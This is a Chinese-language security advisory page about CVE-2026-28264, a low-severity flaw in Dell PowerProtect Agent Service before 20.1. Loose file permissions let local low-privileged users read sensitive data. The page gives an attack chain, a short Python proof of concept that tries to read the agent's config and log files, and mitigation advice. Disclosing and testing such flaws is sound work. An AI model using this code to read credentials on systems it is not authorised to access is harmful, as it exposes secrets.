IPBUF安全漏洞报告
English
CVE-2026-28264 CVSS 3.3 低危

CVE-2026-28264 Dell PowerProtect信息泄露漏洞

披露日期: 2026-04-08

漏洞信息

漏洞编号
CVE-2026-28264
漏洞类型
权限管理不当
CVSS评分
3.3 低危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Dell PowerProtect Agent Service

相关标签

权限管理不当信息泄露Dell PowerProtect本地攻击

漏洞概述

Dell PowerProtect Agent Service 20.1之前的版本存在关键资源权限分配不当漏洞(CVE-2026-28264)。该漏洞源于系统对敏感文件或资源的访问控制设置错误,允许本地低权限用户读取受限数据。攻击者利用此漏洞可导致信息泄露,CVSS v3.1评分为3.3,属于低危级别。建议受影响用户尽快升级至官方修复版本以消除风险。

技术细节

该漏洞的根本原因在于Dell PowerProtect Agent Service在部署过程中对关键系统资源(如配置文件、日志文件或临时数据目录)的访问控制列表(ACL)配置不当。具体而言,软件未能将敏感资源的读取权限限制在必要的系统服务或管理员账户范围内,而是错误地允许了本地低权限用户组(如Users组)进行读取操作。在利用方式上,攻击者首先需要在目标主机上拥有一个低权限的本地账户。随后,攻击者可以通过简单的文件系统浏览命令直接访问Agent的安装目录或数据存储路径。由于权限校验存在缺陷,攻击者能够成功读取包含敏感信息的文件,例如数据库连接字符串、加密凭证或内部网络拓扑信息,从而导致信息泄露。此过程无需用户交互,隐蔽性较高。

攻击链分析

STEP 1
步骤1
攻击者获取目标系统的本地低权限用户访问权限。
STEP 2
步骤2
攻击者定位Dell PowerProtect Agent Service的安装目录及数据文件路径。
STEP 3
步骤3
攻击者尝试读取受影响的关键资源文件(如配置文件)。
STEP 4
步骤4
由于权限配置错误,读取成功,攻击者获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-28264 # Description: Checks for readable sensitive files in Dell PowerProtect Agent directories. import os def check_vulnerability(): # Simulated path for the vulnerable resource target_paths = [ "C:\\Program Files\\Dell\\PowerProtect\\Agent\\config\\agent.conf", "C:\\ProgramData\\Dell\\PowerProtect\\logs\\service.log" ] print(f"[*] Checking {target_paths}...") for path in target_paths: if os.path.exists(path): try: # Attempt to read the file with open(path, 'r') as f: content = f.read() print(f"[+] VULNERABLE: File {path} is readable by low-privileged user!") print(f"[+] Content preview: {content[:100]}...") except PermissionError: print(f"[-] Secure: Permission denied for {path}") except Exception as e: print(f"[!] Error reading {path}: {e}") else: print(f"[-] Path not found: {path}") if __name__ == "__main__": check_vulnerability()

影响范围

Dell PowerProtect Agent Service < 20.1

防御指南

临时缓解措施
如果无法立即升级,建议通过操作系统的访问控制列表(ACL)严格限制Dell PowerProtect相关目录的读取权限,仅允许系统服务账户和管理员访问。同时,启用系统日志审计,监控对敏感文件的非授权访问行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表